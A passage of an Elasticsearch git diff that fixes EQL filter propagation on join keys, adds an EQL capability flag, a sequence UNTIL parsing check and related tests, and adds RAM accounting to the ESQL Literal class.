.setting("xpack.license.self_generated.type", "basic") + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + public EnrichRestIT(final ClientYamlTestCandidate testCandidate) { super(testCandidate); } @@ -22,5 +37,4 @@ public EnrichRestIT(final ClientYamlTestCandidate testCandidate) { public static Iterable parameters() throws Exception { return createParameters(); } - } diff --git a/x-pack/plugin/ent-search/src/test/java/org/elasticsearch/xpack/application/search/SearchApplicationTests.java b/x-pack/plugin/ent-search/src/test/java/org/elasticsearch/xpack/application/search/SearchApplicationTests.java index b4c088487e017..eaa52dfdee7c0 100644 --- 
a/x-pack/plugin/ent-search/src/test/java/org/elasticsearch/xpack/application/search/SearchApplicationTests.java +++ b/x-pack/plugin/ent-search/src/test/java/org/elasticsearch/xpack/application/search/SearchApplicationTests.java @@ -7,7 +7,7 @@ package org.elasticsearch.xpack.application.search; -import org.elasticsearch.TransportVersions; +import org.elasticsearch.TransportVersion; import org.elasticsearch.common.bytes.BytesArray; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.common.io.stream.BytesStreamOutput; @@ -140,7 +140,7 @@ private SearchApplication assertIndexSerialization(SearchApplication testInstanc SearchApplicationIndexService.writeSearchApplicationBinaryWithVersion( testInstance, output, - TransportVersions.MINIMUM_COMPATIBLE + TransportVersion.minimumCompatible() ); try ( StreamInput in = new NamedWriteableAwareStreamInput( diff --git a/x-pack/plugin/eql/qa/common/build.gradle b/x-pack/plugin/eql/qa/common/build.gradle index 5fe6e54a440a8..04cfb01f9376f 100644 --- a/x-pack/plugin/eql/qa/common/build.gradle +++ b/x-pack/plugin/eql/qa/common/build.gradle @@ -8,3 +8,10 @@ dependencies { // TOML parser for EqlActionIT tests api 'io.ous:jtoml:2.0.0' } + +tasks.register("loadTestData", JavaExec) { + group = "Execution" + description = "Loads EQL Spec Tests data on a running stand-alone instance" + classpath = sourceSets.main.runtimeClasspath + mainClass = "org.elasticsearch.test.eql.DataLoader" +} diff --git a/x-pack/plugin/eql/qa/common/src/main/java/org/elasticsearch/test/eql/DataLoader.java b/x-pack/plugin/eql/qa/common/src/main/java/org/elasticsearch/test/eql/DataLoader.java index 4618bd8f4ff3d..2794f514777a5 100644 --- a/x-pack/plugin/eql/qa/common/src/main/java/org/elasticsearch/test/eql/DataLoader.java +++ b/x-pack/plugin/eql/qa/common/src/main/java/org/elasticsearch/test/eql/DataLoader.java @@ -76,39 +76,60 @@ private static Map getReplacementPatterns() { public static void main(String[] args) throws IOException { main = true; try (RestClient client = RestClient.builder(new HttpHost("localhost", 9200)).build()) { - loadDatasetIntoEs(client, DataLoader::createParser); + loadDatasetIntoEsWithIndexCreator(client, DataLoader::createParser, (restClient, indexName, indexMapping) -> { + // don't use ESRestTestCase methods here or, if you do, test running the main method before making the change + StringBuilder jsonBody = new StringBuilder("{"); + jsonBody.append("\"settings\":{\"number_of_shards\":1},"); + jsonBody.append("\"mappings\":"); + jsonBody.append(indexMapping); + jsonBody.append("}"); + + Request request = new Request("PUT", "/" + indexName); + request.setJsonEntity(jsonBody.toString()); + restClient.performRequest(request); + }); } } public static void loadDatasetIntoEs(RestClient client, CheckedBiFunction p) throws IOException { + loadDatasetIntoEsWithIndexCreator(client, p, (restClient, indexName, indexMapping) -> { + ESRestTestCase.createIndex(restClient, indexName, Settings.builder().put("number_of_shards", 1).build(), indexMapping, null); + }); + } + + private static void loadDatasetIntoEsWithIndexCreator( + RestClient client, + CheckedBiFunction p, + IndexCreator indexCreator + ) throws IOException { // // Main Index // - load(client, TEST_INDEX, null, DataLoader::timestampToUnixMillis, p); + load(client, TEST_INDEX, null, DataLoader::timestampToUnixMillis, p, indexCreator); // // Aux Index // - load(client, TEST_EXTRA_INDEX, null, null, p); + load(client, TEST_EXTRA_INDEX, null, null, p, indexCreator); // // Date_Nanos index // 
// The data for this index is loaded from the same endgame-140.data sample, only having the mapping for @timestamp changed: the // chosen Windows filetime timestamps (2017+) can coincidentally also be readily used as nano-resolution unix timestamps (1973+). // There are mixed values with and without nanos precision so that the filtering is properly tested for both cases. - load(client, TEST_NANOS_INDEX, TEST_INDEX, DataLoader::timestampToUnixNanos, p); - load(client, TEST_SAMPLE, null, null, p); + load(client, TEST_NANOS_INDEX, TEST_INDEX, DataLoader::timestampToUnixNanos, p, indexCreator); + load(client, TEST_SAMPLE, null, null, p, indexCreator); // // missing_events index // - load(client, TEST_MISSING_EVENTS_INDEX, null, null, p); - load(client, TEST_SAMPLE_MULTI, null, null, p); + load(client, TEST_MISSING_EVENTS_INDEX, null, null, p, indexCreator); + load(client, TEST_SAMPLE_MULTI, null, null, p, indexCreator); // // index with a runtime field ("broken", type long) that causes shard failures. // the rest of the mapping is the same as TEST_INDEX // - load(client, TEST_SHARD_FAILURES_INDEX, null, DataLoader::timestampToUnixMillis, p); + load(client, TEST_SHARD_FAILURES_INDEX, null, DataLoader::timestampToUnixMillis, p, indexCreator); } private static void load( @@ -116,7 +137,8 @@ private static void load( String indexNames, String dataName, Consumer> datasetTransform, - CheckedBiFunction p + CheckedBiFunction p, + IndexCreator indexCreator ) throws IOException { String[] splitNames = indexNames.split(","); for (String indexName : splitNames) { @@ -130,15 +152,11 @@ private static void load( if (data == null) { throw new IllegalArgumentException("Cannot find resource " + name); } - createTestIndex(client, indexName, readMapping(mapping)); + indexCreator.createIndex(client, indexName, readMapping(mapping)); loadData(client, indexName, datasetTransform, data, p); } } - private static void createTestIndex(RestClient client, String indexName, String mapping) throws IOException { - ESRestTestCase.createIndex(client, indexName, Settings.builder().put("number_of_shards", 1).build(), mapping, null); - } - /** * Reads the mapping file, ignoring comments and replacing placeholders for random types. 
*/ @@ -236,4 +254,8 @@ private static XContentParser createParser(XContent xContent, InputStream data) NamedXContentRegistry contentRegistry = new NamedXContentRegistry(ClusterModule.getNamedXWriteables()); return xContent.createParser(contentRegistry, LoggingDeprecationHandler.INSTANCE, data); } + + private interface IndexCreator { + void createIndex(RestClient client, String indexName, String mapping) throws IOException; + } } diff --git a/x-pack/plugin/eql/qa/rest/build.gradle b/x-pack/plugin/eql/qa/rest/build.gradle index 568a379455563..15990b73de03e 100644 --- a/x-pack/plugin/eql/qa/rest/build.gradle +++ b/x-pack/plugin/eql/qa/rest/build.gradle @@ -12,7 +12,7 @@ apply plugin: 'elasticsearch.internal-test-artifact' restResources { restApi { - include '_common', 'bulk', 'indices', 'eql' + include '_common', 'bulk', 'indices', 'eql', 'capabilities' } } diff --git a/x-pack/plugin/eql/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/eql/70_functions_on_keys.yml b/x-pack/plugin/eql/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/eql/70_functions_on_keys.yml new file mode 100644 index 0000000000000..784de265983c2 --- /dev/null +++ b/x-pack/plugin/eql/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/eql/70_functions_on_keys.yml @@ -0,0 +1,119 @@ +--- +setup: + - requires: + test_runner_features: [ capabilities ] + capabilities: + - method: POST + path: /{index}/_eql/search + parameters: [ ] + capabilities: [ filters_on_keys_fix ] + reason: "Testing a recent fix" + - do: + indices.create: + index: eql_test + body: + { + "mappings": { + "properties": { + "@timestamp": { + "type": "date" + }, + "event": { + "properties": { + "type": { + "type": "keyword", + "ignore_above": 1024 + } + } + }, + "user": { + "properties": { + "domain": { + "type": "keyword", + "ignore_above": 1024 + }, + "name": { + "type": "keyword", + "fields": { + "text": { + "type": "match_only_text" + } + } + } + } + }, + "winlog": { + "dynamic": "true", + "properties": { + "computer_name": { + "type": "keyword", + "ignore_above": 1024 + } + } + }, + "source": { + "properties": { + "ip": { + "type": "ip" + } + } + } + } + } + } + - do: + bulk: + refresh: true + body: + - index: + _index: eql_test + _id: "1" + - "winlog": + "computer_name": "foo.bar.baz" + "@timestamp": "2025-06-18T12:21:37.018Z" + "event": + "category": "authentication" + "code": "5145" + "user": + "domain": "bar.baz" + "name": "something" + "source": + "ip": "192.168.56.200" + - index: + _index: eql_test + _id: "2" + - "winlog": + "computer_name": "foo.bar.baz" + "@timestamp": "2025-06-18T12:21:37.093Z" + "event": + "category": "authentication" + "user": + "domain": "BAR.BAZ" + "name": "foo$" + "source": + "ip": "192.168.56.200" + +--- +"Test one join key": + - do: + eql.search: + index: eql_test + body: + query: 'sequence by source.ip with maxspan=5s [any where event.code : "5145" and winlog.computer_name == "foo.bar.baz" ] [any where winlog.computer_name == "foo.bar.baz" and startswith(winlog.computer_name, substring(user.name, 0, -1)) ]' + + - match: {timed_out: false} + - match: {hits.total.value: 1} + - match: {hits.total.relation: "eq"} + +--- +"Test two join keys ": + - do: + eql.search: + index: eql_test + body: + query: 'sequence by source.ip, winlog.computer_name with maxspan=5s [any where event.code : "5145" and winlog.computer_name == "foo.bar.baz" ] [any where winlog.computer_name == "foo.bar.baz" and startswith(winlog.computer_name, substring(user.name, 0, -1)) ]' + + - match: {timed_out: false} + - match: {hits.total.value: 1} + 
- match: {hits.total.relation: "eq"} + diff --git a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/optimizer/Optimizer.java b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/optimizer/Optimizer.java index 5bccf013bc789..8f0757814e74a 100644 --- a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/optimizer/Optimizer.java +++ b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/optimizer/Optimizer.java @@ -23,6 +23,7 @@ import org.elasticsearch.xpack.eql.session.Payload.Type; import org.elasticsearch.xpack.eql.util.MathUtils; import org.elasticsearch.xpack.eql.util.StringUtils; +import org.elasticsearch.xpack.ql.expression.Attribute; import org.elasticsearch.xpack.ql.expression.Expression; import org.elasticsearch.xpack.ql.expression.FieldAttribute; import org.elasticsearch.xpack.ql.expression.Literal; @@ -44,7 +45,6 @@ import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.BinaryComparisonSimplification; import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.BooleanFunctionEqualsElimination; import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.BooleanSimplification; -import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.CombineDisjunctionsToIn; import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.ConstantFolding; import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.LiteralsOnTheRight; import org.elasticsearch.xpack.ql.optimizer.OptimizerRules.OptimizerRule; @@ -252,6 +252,14 @@ protected Expression maybeSimplifyNegatable(Expression e) { } + static class CombineDisjunctionsToIn extends org.elasticsearch.xpack.ql.optimizer.OptimizerRules.CombineDisjunctionsToIn { + + @Override + protected boolean shouldValidateIn() { + return true; + } + } + static class PruneFilters extends org.elasticsearch.xpack.ql.optimizer.OptimizerRules.PruneFilters { @Override @@ -409,23 +417,29 @@ private static List detectKeyConstraints(Expression condition, Keyed List and = Predicates.splitAnd(condition); for (Expression exp : and) { - // if there are no conjunction and at least one key matches, save the expression along with the key - // and its ordinal so it can be replaced - if (exp.anyMatch(Or.class::isInstance) == false) { - // comparisons against variables are not done - // hence why on the first key match, the expression is picked up - exp.anyMatch(e -> { - for (int i = 0; i < keys.size(); i++) { - Expression key = keys.get(i); - if (e.semanticEquals(key)) { - constraints.add(new Constraint(exp, filter, i)); - return true; - } - } - return false; - }); + // if the expression only involves filter keys, it's simple enough (eg. 
there are no disjunctions), and at least one key + // matches, save the expression along with the key and its ordinal so it can be replaced + if (exp.anyMatch(Or.class::isInstance)) { + continue; + } + + // expressions that involve attributes other than the keys have to be discarded + if (exp.anyMatch(x -> x instanceof Attribute && keys.stream().noneMatch(k -> x.semanticEquals(k)))) { + continue; + } + + exp.anyMatch(e -> { + for (int i = 0; i < keys.size(); i++) { + Expression key = keys.get(i); + if (e.semanticEquals(key)) { + constraints.add(new Constraint(exp, filter, i)); + return true; + } + } + return false; + }); } + return constraints; } diff --git a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/parser/LogicalPlanBuilder.java b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/parser/LogicalPlanBuilder.java index 194c2c7fde459..620731f4b6911 100644 --- a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/parser/LogicalPlanBuilder.java +++ b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/parser/LogicalPlanBuilder.java @@ -330,6 +330,9 @@ public Sequence visitSequence(SequenceContext ctx) { // until is already parsed through sequenceTerm() above if (ctx.until != null) { + if (queries.size() == 2) { + throw new ParsingException(source, "A sequence requires a minimum of 2 queries (excluding UNTIL clause), found [1]"); + } until = queries.remove(queries.size() - 1); } else { until = defaultUntil(source); } diff --git a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/EqlCapabilities.java b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/EqlCapabilities.java new file mode 100644 index 0000000000000..a3af8a932fa66 --- /dev/null +++ b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/EqlCapabilities.java @@ -0,0 +1,26 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0.
+ */ + +package org.elasticsearch.xpack.eql.plugin; + +import java.util.HashSet; +import java.util.Set; + +public final class EqlCapabilities { + + private EqlCapabilities() {} + + /** Fix bug on filters that include join keys https://github.com/elastic/elasticsearch/issues/133065 */ + private static final String FILTERS_ON_KEYS_FIX = "filters_on_keys_fix"; + + public static final Set CAPABILITIES; + static { + HashSet capabilities = new HashSet<>(); + capabilities.add(FILTERS_ON_KEYS_FIX); + CAPABILITIES = Set.copyOf(capabilities); + } +} diff --git a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/RestEqlSearchAction.java b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/RestEqlSearchAction.java index 65def24563e5e..651868eb04183 100644 --- a/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/RestEqlSearchAction.java +++ b/x-pack/plugin/eql/src/main/java/org/elasticsearch/xpack/eql/plugin/RestEqlSearchAction.java @@ -29,6 +29,7 @@ import java.io.IOException; import java.util.List; +import java.util.Set; import static org.elasticsearch.rest.RestRequest.Method.GET; import static org.elasticsearch.rest.RestRequest.Method.POST; @@ -116,4 +117,9 @@ public void onFailure(Exception e) { public String getName() { return "eql_search"; } + + @Override + public Set supportedCapabilities() { + return EqlCapabilities.CAPABILITIES; + } } diff --git a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCSerializationTestCase.java b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCSerializationTestCase.java index 2e8b8578b5056..5c401524fd82c 100644 --- a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCSerializationTestCase.java +++ b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCSerializationTestCase.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.eql; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.Writeable; import org.elasticsearch.test.AbstractXContentSerializingTestCase; import org.elasticsearch.test.TransportVersionUtils; @@ -21,7 +20,7 @@ public abstract class AbstractBWCSerializationTestCase extends AbstractXContentSerializingTestCase { private static NavigableSet getAllBWCVersions() { - return TransportVersionUtils.allReleasedVersions().tailSet(TransportVersions.MINIMUM_COMPATIBLE, true); + return TransportVersionUtils.allReleasedVersions().tailSet(TransportVersion.minimumCompatible(), true); } private static final NavigableSet DEFAULT_BWC_VERSIONS = getAllBWCVersions(); diff --git a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCWireSerializingTestCase.java b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCWireSerializingTestCase.java index 76c2b3355e236..e174bcff5d855 100644 --- a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCWireSerializingTestCase.java +++ b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/AbstractBWCWireSerializingTestCase.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.eql; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.Writeable; import org.elasticsearch.test.AbstractWireSerializingTestCase; import org.elasticsearch.test.TransportVersionUtils; @@ -20,7 +19,7 @@ public abstract class AbstractBWCWireSerializingTestCase extends AbstractWireSerializingTestCase { private static 
NavigableSet getAllBWCVersions() { - return TransportVersionUtils.allReleasedVersions().tailSet(TransportVersions.MINIMUM_COMPATIBLE, true); + return TransportVersionUtils.allReleasedVersions().tailSet(TransportVersion.minimumCompatible(), true); } private static final NavigableSet DEFAULT_BWC_VERSIONS = getAllBWCVersions(); diff --git a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/optimizer/OptimizerTests.java b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/optimizer/OptimizerTests.java index 199117c3df43a..934f913e469d4 100644 --- a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/optimizer/OptimizerTests.java +++ b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/optimizer/OptimizerTests.java @@ -12,6 +12,7 @@ import org.elasticsearch.xpack.eql.analysis.Analyzer; import org.elasticsearch.xpack.eql.analysis.PostAnalyzer; import org.elasticsearch.xpack.eql.analysis.PreAnalyzer; +import org.elasticsearch.xpack.eql.expression.function.scalar.string.StartsWith; import org.elasticsearch.xpack.eql.expression.function.scalar.string.ToString; import org.elasticsearch.xpack.eql.parser.EqlParser; import org.elasticsearch.xpack.eql.plan.logical.AbstractJoin; @@ -576,6 +577,113 @@ public void testQueryLevelTwoKeyConstraints() { assertEquals(ruleBCondition, filterCondition(query2.child().children().get(0))); } + /** + * sequence + * 1. filter startsWith(a, "foo") by a + * 2. filter X by a + * == + * 1. filter startsWith(a, "foo") by a + * 2. filter startsWith(a, "foo") by a + * \filter X + */ + public void testKeyConstraintWithFunction() { + Attribute a = key("a"); + + Expression keyCondition = startsWithExp(a, new Literal(EMPTY, "foo", DataTypes.KEYWORD)); + Expression filter = equalsExpression(); + + KeyedFilter rule1 = keyedFilter(basicFilter(keyCondition), a); + KeyedFilter rule2 = keyedFilter(basicFilter(filter), a); + + AbstractJoin j = randomSequenceOrSample(rule1, rule2); + + List queries = j.queries(); + assertEquals(rule1, queries.get(0)); + assertEquals(keyCondition, filterCondition(queries.get(1).child())); + assertEquals(filterCondition(rule2.child()), filterCondition(queries.get(1).child().children().get(0))); + } + + /** + * sequence + * 1. filter startsWith(a, b) by a + * 2. filter X by a + * == + * same + */ + public void testKeyConstraintWithNonKey() { + Attribute a = key("a"); + + Expression keyCondition = startsWithExp(a, key("b")); + Expression filter = equalsExpression(); + + KeyedFilter rule1 = keyedFilter(basicFilter(keyCondition), a); + KeyedFilter rule2 = keyedFilter(basicFilter(filter), a); + + AbstractJoin j = randomSequenceOrSample(rule1, rule2); + + List queries = j.queries(); + assertEquals(rule1, queries.get(0)); + assertEquals(rule2, queries.get(1)); + } + + /** + * sequence + * 1. filter startsWith(a, b) and c > 10 by a, c + * 2. filter X by a, c + * == + * 1. filter startsWith(a, b) and c > 10 by a, c + * 2. 
filter c > 10 by a, c + * \filter X + */ + public void testKeyConstraintWithNonKeyPartialPropagation() { + Attribute a = key("a"); + Attribute b = key("b"); + Attribute c = key("c"); + + GreaterThan gtExp = gtExpression(c); + Expression keyCondition = new And(EMPTY, startsWithExp(a, b), gtExp); + Expression filter = equalsExpression(); + + KeyedFilter rule1 = keyedFilter(basicFilter(keyCondition), a, c); + KeyedFilter rule2 = keyedFilter(basicFilter(filter), a, c); + + AbstractJoin j = randomSequenceOrSample(rule1, rule2); + + List queries = j.queries(); + assertEquals(rule1, queries.get(0)); + assertEquals(gtExp, filterCondition(queries.get(1).child())); + assertEquals(filterCondition(rule2.child()), filterCondition(queries.get(1).child().children().get(0))); + } + + /** + * sequence + * 1. filter startsWith(a, b) by a, c + * 2. filter X and c > 10 by a, c + * == + * 1. filter c > 10 by a, c + * \filter startsWith(a, b) + * 2. filter X and c > 10 by a, c + */ + public void testKeyConstraintWithNonKeyPartialReversePropagation() { + Attribute a = key("a"); + Attribute b = key("b"); + Attribute c = key("c"); + + GreaterThan gtExp = gtExpression(c); + Expression keyCondition = startsWithExp(a, b); + Expression filter = new And(EMPTY, equalsExpression(), gtExp); + + KeyedFilter rule1 = keyedFilter(basicFilter(keyCondition), a, c); + KeyedFilter rule2 = keyedFilter(basicFilter(filter), a, c); + + AbstractJoin j = randomSequenceOrSample(rule1, rule2); + + List queries = j.queries(); + assertEquals(gtExp, filterCondition(queries.get(0).child())); + assertEquals(filterCondition(rule1.child()), filterCondition(queries.get(0).child().children().get(0))); + assertEquals(rule2, queries.get(1)); + } + /** * Key conditions inside a disjunction (OR) are ignored *
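// Taken together, the tests above pin down the propagation rule: a filter fragment is copied across the queries of a sequence or sample only when every attribute it references is a join key; fragments touching non-key attributes (e.g. startsWith(a, b) where b is not a key) stay in their own query, and conjunctions are split so that the eligible parts still propagate.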
@@ -817,4 +925,8 @@ private static Equals equalsExpression() { private static GreaterThan gtExpression(Attribute b) { return new GreaterThan(EMPTY, b, new Literal(EMPTY, 1, INTEGER), UTC); } + + private static StartsWith startsWithExp(Expression a, Expression b) { + return new StartsWith(EMPTY, a, b, randomBoolean()); + } } diff --git a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/planner/QueryTranslatorFailTests.java b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/planner/QueryTranslatorFailTests.java index e94f813a162f6..e67561962bc72 100644 --- a/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/planner/QueryTranslatorFailTests.java +++ b/x-pack/plugin/eql/src/test/java/org/elasticsearch/xpack/eql/planner/QueryTranslatorFailTests.java @@ -261,6 +261,17 @@ public void testSequenceWithTooLittleQueries() throws Exception { assertEquals("1:2: A sequence requires a minimum of 2 queries, found [1]", s); } + public void testSequenceWithTooLittleQueriesWithUntil() throws Exception { + String s = errorParsing("sequence [any where true] until [any where true]"); + assertEquals("1:2: A sequence requires a minimum of 2 queries (excluding UNTIL clause), found [1]", s); + plan("sequence [any where true] [any where true] until [any where true]"); + } + + public void testSequenceWithOnlyMissingEventsAndUntil() throws Exception { + String s = errorParsing("sequence with maxspan=1h ![process where true] until [process where true]"); + assertEquals("1:2: A sequence requires a minimum of 2 queries (excluding UNTIL clause), found [1]", s); + } + public void testSequenceWithIncorrectOption() throws Exception { EqlClientException e = expectThrows(EqlClientException.class, () -> plan("sequence [any where true] with repeat=123")); String msg = e.getMessage(); diff --git a/x-pack/plugin/eql/src/test/resources/querytranslator_tests.txt b/x-pack/plugin/eql/src/test/resources/querytranslator_tests.txt index 00c08096fd084..84ad63b964981 100644 --- a/x-pack/plugin/eql/src/test/resources/querytranslator_tests.txt +++ b/x-pack/plugin/eql/src/test/resources/querytranslator_tests.txt @@ -123,6 +123,90 @@ process where process_name in ("python.exe", "SMSS.exe", "explorer.exe") "terms":{"process_name":["python.exe","SMSS.exe","explorer.exe"], ; +multipleOrEquals_As_InTranslation1 +process where process_name == "python.exe" or process_name == "SMSS.exe" or process_name == "explorer.exe" +; +"terms":{"process_name":["python.exe","SMSS.exe","explorer.exe"], +; + +multipleOrAndEquals_As_InTranslation +process where process_name == "python.exe" and process_name == "SMSS.exe" or process_name == "explorer.exe" or process_name == "test.exe" +; +{"bool":{"should":[{"bool":{"must":[{"term":{"process_name":{"value":"python.exe"}}},{"term":{"process_name":{"value":"SMSS.exe"}}}],"boost":1.0}},{"terms":{"process_name":["explorer.exe","test.exe"],"boost":1.0}}],"boost":1.0}} +; + +multipleOrEquals_As_InTranslation2 +process where source_address == "123.12.1.1" or (opcode == 123 or opcode == 127) +; +{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"terms":{"opcode":[123,127],"boost":1.0}}],"boost":1.0}} +; + +multipleOrEquals_As_InTranslation3 +process where (source_address == "123.12.1.1" or source_address == "127.0.0.1") and (opcode == 123 or opcode == 127) +; +{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"term":{"source_address":{"value":"127.0.0.1"}}}],"boost":1.0}},{"terms":{"opcode":[123,127],"boost":1.0}} +; + +multipleOrEquals_As_InTranslation4
+process where (source_address == "123.12.1.1" or source_address == "127.0.0.1") and (opcode == 123 or opcode == 127) +; +"must":[{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"term":{"source_address":{"value":"127.0.0.1"}}}],"boost":1.0}},{"terms":{"opcode":[123,127],"boost":1.0}},{"term":{"event.category":{"value":"process"}}}] +; + +multipleOrIncompatibleTypes1 +process where process_name == "python.exe" or process_name == 2 or process_name == "3" +; +{"bool":{"should":[{"term":{"process_name":{"value":"python.exe"}}},{"term":{"process_name":{"value":2}}},{"term":{"process_name":{"value":"3"}}}],"boost":1.0}} +; + +multipleOrIncompatibleTypes2 +process where process_name == "1" or process_name == 2 or process_name == "3" +; +{"bool":{"should":[{"term":{"process_name":{"value":"1"}}},{"term":{"process_name":{"value":2}}},{"term":{"process_name":{"value":"3"}}}],"boost":1.0}} +; + +multipleOrIncompatibleTypes3 +process where process_name == 1.2 or process_name == 2 or process_name == "3" +; +{"bool":{"should":[{"term":{"process_name":{"value":1.2}}},{"term":{"process_name":{"value":2}}},{"term":{"process_name":{"value":"3"}}}],"boost":1.0}} +; + +// this query as an equivalent with +// process where process_name in (1.2, 2, 3) +// will result in a user error: 1st argument of [process_name in (1.2, 2, 3)] must be [keyword], found value [1.2] type [double] +multipleOrIncompatibleTypes4 +process where process_name == 1.2 or process_name == 2 or process_name == 3 +; +{"bool":{"should":[{"term":{"process_name":{"value":1.2}}},{"term":{"process_name":{"value":2}}},{"term":{"process_name":{"value":3}}}],"boost":1.0}} +; + +// this query as an equivalent with +// process where source_address in ("123.12.1.1", "123.12.1.2") +// will result in a user error: 1st argument of [source_address in ("123.12.1.1", "123.12.1.2")] must be [ip], found value ["123.12.1.1"] type [keyword] +multipleOrIncompatibleTypes5 +process where source_address == "123.12.1.1" or source_address == "123.12.1.2" +; +{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"term":{"source_address":{"value":"123.12.1.2"}}}],"boost":1.0}} +; + +multipleOrIncompatibleTypes6 +process where source_address == "123.12.1.1" or source_address == concat("123.12.","1.2") +; +{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"term":{"source_address":{"value":"123.12.1.2"}}}],"boost":1.0}} +; + +multipleOrIncompatibleTypes7 +process where source_address == "123.12.1.1" and (source_address == "123.12.1.2" or source_address >= "127.0.0.1") +; +"must":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.2"}}},{"range":{"source_address":{"gte":"127.0.0.1","boost":1.0}}}],"boost":1.0}},{"term":{"event.category":{"value":"process"}}}] +; + +multipleOrIncompatibleTypes8 +process where source_address == "123.12.1.1" and (source_address == "123.12.1.2" or source_address == "127.0.0.1") +; +"must":[{"term":{"source_address":{"value":"123.12.1.1"}}},{"bool":{"should":[{"term":{"source_address":{"value":"123.12.1.2"}}},{"term":{"source_address":{"value":"127.0.0.1"}}}],"boost":1.0}},{"term":{"event.category":{"value":"process"}}}] +; + inFilterWithScripting process where substring(command_line, 5) in ("test*","best") ; diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/AttributeSet.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/AttributeSet.java 
index d281db4e6bf63..fefaf3098319e 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/AttributeSet.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/AttributeSet.java @@ -261,5 +261,9 @@ public boolean isEmpty() { public AttributeSet build() { return new AttributeSet(mapBuilder.build()); } + + public void clear() { + mapBuilder.keySet().clear(); + } } } diff --git a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/Literal.java b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/Literal.java index 1bfb96a1b0f9d..d6f74144a9717 100644 --- a/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/Literal.java +++ b/x-pack/plugin/esql-core/src/main/java/org/elasticsearch/xpack/esql/core/expression/Literal.java @@ -6,7 +6,9 @@ */ package org.elasticsearch.xpack.esql.core.expression; +import org.apache.lucene.util.Accountable; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; @@ -35,7 +37,9 @@ /** * Literal or constant. */ -public class Literal extends LeafExpression { +public class Literal extends LeafExpression implements Accountable { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Literal.class); + public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( Expression.class, "Literal", @@ -169,6 +173,17 @@ public String nodeString() { return toString() + "[" + dataType + "]"; } + @Override + public long ramBytesUsed() { + long ramBytesUsed = BASE_RAM_BYTES_USED; + if (value instanceof BytesRef b) { + ramBytesUsed += b.length; + } else { + ramBytesUsed += RamUsageEstimator.sizeOfObject(value); + } + return ramBytesUsed; + } + /** * Utility method for creating a literal out of a foldable expression. * 